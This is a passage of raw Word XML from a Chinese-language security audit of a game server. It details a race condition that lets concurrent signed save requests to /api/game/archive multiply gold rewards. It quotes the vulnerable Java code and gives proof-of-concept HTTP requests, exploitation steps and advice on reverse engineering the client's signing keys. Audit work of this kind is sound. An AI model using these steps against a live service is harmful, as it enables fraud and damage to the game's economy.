          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的更新在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>settleArchiveGoldNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之后才发生（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.setLastArchiveTime(now)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.save(user)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），导致保护窗口与结算窗口之间存在间隙，且两者针对不同的表行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="179"/>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：攻击者每发起一次并发组（N 个并发请求）即可将当前结算周期的金币奖励放大至 N 倍；若持续操作，账户金币余额可在短时间内指数级增长，直接造成游戏经济系统崩溃。</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入口：ArchiveController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/archive")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; archive(@CurrentUserId Long userId,           // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                  @RequestBody @Valid ArchiveSaveRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    archiveService.saveArchiveNew(userId, request);                    // ← 进入事务</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：ArchiveService.java — saveArchiveNew</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void saveArchiveNew(Long userId, ArchiveSaveRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = userRepository.findById(userId).orElseThrow(...);      // ← User 实体进入 JPA 一级缓存，lastArchiveTime = T1</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();                           // ← 服务端时间，不可篡改</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    settleArchiveGoldNew(userId, user, now);                           // ← 以缓存 user 对象传入；行锁在此方法内部获取</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.recalcUserLevelAndHashRate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user.setLastArchiveTime(now);                                      // ← 保护变量更新在结算之后，且只更新内存对象</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user.setLastMiningAt(now);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.save(user);                                         // ← 持久化 lastArchiveTime；此时事务 B 的 user 对象已无法感知</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：ArchiveService.java — settleArchiveGoldNew</w:t>
              <w:br/>
              <w:t>private void settleArchiveGoldNew(Long userId, User user, LocalDateTime now) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime lastArchive = user.getLastArchiveTime();             // ← ⚠️ 读取 JPA 缓存中的 T1；事务 B 并发时此值永远是旧值</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal oldHashRate = user.getCurrentTotalHashRate() != null</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            ? user.getCurrentTotalHashRate() : BigDecimal.ZERO;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if (lastArchive == null || oldHashRate.compareTo(BigDecimal.ZERO) &lt;= 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    long seconds = ChronoUnit.SECONDS.between(lastArchive, now);       // ← 两个并发事务计算出相同的 seconds</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (seconds &lt;= 0) { return; }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    seconds = Math.min(seconds, resolveArchiveGoldMaxSeconds());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal goldToAdd = oldHashRate.multiply(BigDecimal.valueOf(seconds)); // ← ⚠️ goldToAdd 在行锁外提前计算完成</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.findByUserIdForUpdate(userId).ifPresent(account -&gt; { // ← 行锁只保证写入串行，无法重置上方已计算的 goldToAdd</w:t>
              <w:br/>
              <w:t xml:space="preserve">        BigDecimal cur = account.getGoldBalance() != null ? account.getGoldBalance() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setGoldBalance(cur.add(goldToAdd));                    // ← 漏洞点：事务 B 等锁后仍写入与事务 A 相同的 goldToAdd</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userAccountRepository.save(account);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步骤：发送 N 个并发存档请求（以 2 个为例，时间戳和 nonce 各不相同以满足签名防重放）</w:t>
              <w:br/>
              <w:br/>
              <w:t># 请求 1（与请求 2 几乎同时发出）</w:t>
              <w:br/>
              <w:t>POST /api/game/archive HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;客户端 AppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;基于 body+timestamp1+nonce1 计算的合法签名&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp1&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce1&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "slots": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 1, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 2, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 3, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 4, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 5, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 6, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 7, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 8, "minerLevel": null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId": 9, "minerLevel": null}</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "storage": []</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t># 请求 2（几乎同时发出，nonce 不同）</w:t>
              <w:br/>
              <w:t>POST /api/game/archive HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;客户端 AppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;基于 body+timestamp2+nonce2 计算的合法签名&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp2&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{ ...（内容与请求 1 相同）... }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用正常游戏客户端登录，获取有效 Bearer Token，并确保账户具有一定 hashRate（大于 0）且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不为 null。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用客户端内置的 AppKey/AppSecret 为两个（或多个）存档请求分别生成合法签名（nonce 不同，timestamp 相差 ≤5 秒）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">利用并发工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，或 Burp Suite Intruder 的 parallel 模式）同时发出 N 个请求，确保它们在服务端近乎同时进入事务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查询账户金币余额，预期结果：金币增加量为单次正常结算量的 N 倍。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重复操作可无限放大金币余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每组并发 2 次请求，金币余额增加量翻倍（即 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldBalance += goldToAdd × N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。连续操作可使余额指数级增长。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="185"/>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（需要合法用户 Token + 客户端签名凭证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="186"/>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普通已登录用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（无需管理员权限）；需掌握客户端 AppKey/AppSecret（存在于客户端 App 中，可通过逆向获取）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 4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受影响调用链（5 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="187"/>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ArchiveService.java.settleArchiveGoldNew → ArchiveService.java.resolveArchiveGoldMaxSeconds → OfflineRewardConfigRepository.java.findFirstByOrderByIdAsc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="188"/>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ArchiveService.java.settleArchiveGoldNew → ArchiveService.java.resolveArchiveGoldMaxSeconds → OfflineRewardConfig.java.getMaxHours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="189"/>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ArchiveService.java.settleArchiveGoldNew → UserAccountRepository.java.findByUserIdForUpdate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="190"/>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ArchiveService.java.settleArchiveGoldNew → User.java.getCurrentTotalHashRate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="191"/>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ArchiveService.java.settleArchiveGoldNew → User.java.getLastArchiveTime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audit_m058_127_archive_ctrl-path1of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_139_archive_ctrl-path2of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_186_archive_ctrl-path5of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_199_archive_ctrl-path6of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_216_archive_ctrl-path7of25.md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：ArchiveService.java#settleArchiveGoldNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_10" w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞9：存档接口 settleArchiveGoldNew 中 TOCTOU 竞态条件导致金币多倍结算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="19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：并发存档请求利用 TOCTOU 竞态多倍领取金币结算收益</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="19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src/main/java/com/gameBack/mjservice/service/ArchiveService.java:settleArchiveGoldNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="19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19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：严重</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="19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：普通用户（需有效 Bearer Token 及请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="197"/>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saveArchiveNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法中通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findById(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读取用户对象时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未施加 `FOR UPDATE` 行锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，导致用户的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（上次存档时间）与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（算力）在多个并发事务中均读取到相同的旧快照值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">后续 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>settleArchiveGoldNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 依据该旧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 计算时间差 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，进而得到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd = oldHashRate × seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。虽然余额写入使用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行锁来序列化写操作，但该锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>仅保证写入有序，无法防止两个事务各自携带相同基数 `goldToAdd` 先后入账</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
